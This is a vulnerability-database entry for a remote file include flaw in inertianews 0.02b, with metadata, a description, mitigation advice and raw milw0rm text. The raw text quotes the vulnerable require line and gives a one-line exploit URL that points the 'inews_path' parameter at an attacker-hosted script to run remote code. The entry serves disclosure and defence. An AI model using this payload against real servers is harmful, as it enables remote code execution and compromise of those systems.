inertianews 0.02b Remote File Include Vulnerability

vendor:

inertianews

by:

bd0rk

9,3

CVSS

HIGH

Remote File Include

CWE

Product Name: inertianews

Affected Version From: 0.02b

Affected Version To: 0.02b

Patch Exists: YES

Related CWE: N/A

CPE: a:inertianews:inertianews:0.02b

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

inertianews 0.02b Remote File Include Vulnerability

A vulnerability exists in inertianews 0.02b which allows a remote attacker to include a file from a remote host. The vulnerability is due to the 'inews_path' parameter in 'inertianews_main.php' not properly sanitized before being used in a 'require' statement. This can be exploited to include arbitrary files from remote hosts resulting in arbitrary remote code execution.

Mitigation:

Input should be validated and filtered for malicious characters before being used in a 'require' statement.

Source

Exploit-DB raw data:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                                                     +
+ inertianews 0.02b Remote File Include Vulnerability +
+                                                     +
+ Found3R: bd0rk || SOH-Crew                          +
+                                                     +
+ eMail: bd0rk[at]hackermail.com                      +
+                                                     +
+ Greetz: str0ke, TheJT, Axel H., Carsten S.          +
+                                                     +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++

Download: http://www.brentc.com/inertianews/download/inertianews02b.zip

=> Vulnerable Code in inertianews_main.php <=

Code: require ("$inews_path/inertia_sql_class.php");

[+]Exploit: http://[host]/[inertia_dir]/inertianews_main.php?inews_path=http://[TroubleScript]

Special-Greetz: ajann, Kacper, Google-Team :-)

# milw0rm.com [2006-12-21]